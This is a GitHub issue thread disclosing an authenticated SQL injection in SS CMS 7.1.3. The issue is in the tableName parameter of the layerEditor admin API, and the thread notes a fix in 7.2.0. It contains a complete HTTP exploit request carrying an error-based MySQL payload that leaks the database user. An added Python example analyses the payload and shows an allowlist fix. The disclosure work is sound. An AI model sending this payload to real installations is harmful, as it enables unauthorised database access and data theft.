siteserver / cms

SS CMS is built on .NET Core and lets you set up a fully featured, high-performance, large-scale and easily maintained website platform at the lowest cost, with the least manpower and in the shortest time.
https://sscms.com
GNU Affero General Public License v3.0

Backend SQL injection #3490

Open nolan124 opened 2 years ago

nolan124 commented 2 years ago

This was found by Chaitin Security Research Lab.

starlying commented 2 years ago

cve-2022-0066 cve-2022-0067 cve-2022-0068

nolan124 commented 2 years ago

You need to apply to the official CVE authority.

nolan124 commented 2 years ago

Environment: sscms 7.1.3 + MySQL (backend administrator account)

Vulnerability details

api/admin/common/tableStyle/layerEditor

step1

`\SSCMS.Web\Controllers\Admin\Common\TableStyle\LayerEditorController.Submit.cs`, update function

[screenshot]

step2

[screenshot]

[screenshot]

Execution then enters the InsertObjectAsync method in `\cms-sscms-v7.1.3\src\Datory\Utils\RepositoryUtils.Insert.cs`:

[screenshot]

The table name is passed directly into the SQL statement without filtering. The returned result is not filtered either, and no other processing is applied to the SQL statement, so a SQL injection vulnerability results.

Vulnerability reproduction

Exploit result:

```http
POST /api/admin/common/tableStyle/layerEditor HTTP/1.1
Host: 192.168.3.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 338
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV_e3RdiKPG4BjVFKBPZkdTU
Content-Type: application/json;charset=UTF-8
Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I
Origin: http://192.168.3.129
Referer: http://192.168.3.129/ss-admin/common/tableStyleLayerEditor/?siteId=1&tableName=siteserver_Site&relatedIdentities=1%2C0&attributeName=weichat
Accept-Encoding: gzip

{"attributeName":"weichat","customizeCode":null,"defaultValue":"1","displayName":"111","height":0,"helpText":"11","horizontal":false,"inputType":"Image","isRapid":true,"items":null,"rapidValues":"","relatedFieldId":null,"relatedIdentities":"1,0","tableName":"siteserver_Site'and/**/extractvalue(1,concat(char(126),user()))and'","taxis":1}
```

[screenshot]
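The following is an added example (editor's code, not SS CMS or Datory source) that shows why the `tableName` payload in the request above works and what the check at the controller boundary should look like. The INSERT shape in `build_insert_unsafe`, the `siteserver_TableStyle` columns used and the `KNOWN_TABLES` allowlist are assumptions made for the demonstration; the real statement text lives in `RepositoryUtils.Insert.cs` and is not reproduced here. The hardened path runs against an in-memory SQLite database so the block is self-contained; the error-based part of the payload (`extractvalue`) is MySQL-specific and is only analysed at the statement-text level.

```python
"""Editor's example for the tableName injection reported above (not project code)."""
import re
import sqlite3

# tableName value taken from the report's request body. Spliced into a quoted
# literal it yields  'siteserver_Site' AND extractvalue(1, '~root@host') AND ''
# which MySQL evaluates; extractvalue() then raises an XPATH syntax error whose
# message echoes the concatenated user(), leaking it through the error response.
# char(126) is '~', which forces the XPath error; /**/ stands in for a space.
PAYLOAD = "siteserver_Site'and/**/extractvalue(1,concat(char(126),user()))and'"

# Constructed allowlist for this example; the real set comes from the schema.
KNOWN_TABLES = {"siteserver_Site", "siteserver_Channel", "siteserver_Content"}

IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")
# A single-quoted SQL string literal; '' inside it is an escaped quote.
LITERAL = re.compile(r"'(?:[^']|'')*'")


def build_insert_unsafe(table_name: str, attribute_name: str) -> str:
    """Assumed vulnerable construction: the request value is spliced into SQL text."""
    return ("INSERT INTO siteserver_TableStyle (TableName, AttributeName) "
            f"VALUES ('{table_name}', '{attribute_name}')")


def code_outside_literals(sql: str) -> str:
    """Blank every string literal so only the parts parsed as SQL code remain."""
    return LITERAL.sub("''", sql)


def is_injected(sql: str) -> bool:
    """True when the attacker's function call is parsed as SQL rather than as data."""
    return "extractvalue(" in code_outside_literals(sql).lower()


def validate_table_name(table_name: str) -> str:
    """Identifiers cannot be bound as parameters, so allowlist them instead."""
    if not IDENTIFIER.fullmatch(table_name) or table_name not in KNOWN_TABLES:
        raise ValueError(f"rejected tableName: {table_name!r}")
    return table_name


def insert_safe(conn: sqlite3.Connection, table_name: str, attribute_name: str) -> None:
    """Hardened path: allowlisted identifier, values bound as parameters."""
    conn.execute(
        "INSERT INTO siteserver_TableStyle (TableName, AttributeName) VALUES (?, ?)",
        (validate_table_name(table_name), attribute_name),
    )


def stored_table_names(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT TableName FROM siteserver_TableStyle")]


def demo() -> dict:
    """Compare the benign and malicious tableName on both code paths."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE siteserver_TableStyle (TableName TEXT, AttributeName TEXT)")
    insert_safe(conn, "siteserver_Site", "weichat")
    try:
        insert_safe(conn, PAYLOAD, "weichat")
        rejected = False
    except ValueError:
        rejected = True
    return {
        "benign_injected": is_injected(build_insert_unsafe("siteserver_Site", "weichat")),
        "payload_injected": is_injected(build_insert_unsafe(PAYLOAD, "weichat")),
        "payload_rejected": rejected,
        "stored": stored_table_names(conn),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
    print(code_outside_literals(build_insert_unsafe(PAYLOAD, "weichat")))
```

The statement-text check is the useful diagnostic here: after blanking the literals, the concatenated query still contains `extractvalue(`, i.e. the attacker controls SQL code, not merely a stored value. Because a table name is an identifier, binding it as a parameter is not an option; the only sound fix is to reject anything that is not a known table before it reaches the query builder, which is what `validate_table_name` does.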
starlying commented 1 year ago

Fixed in 7.2.0, thanks.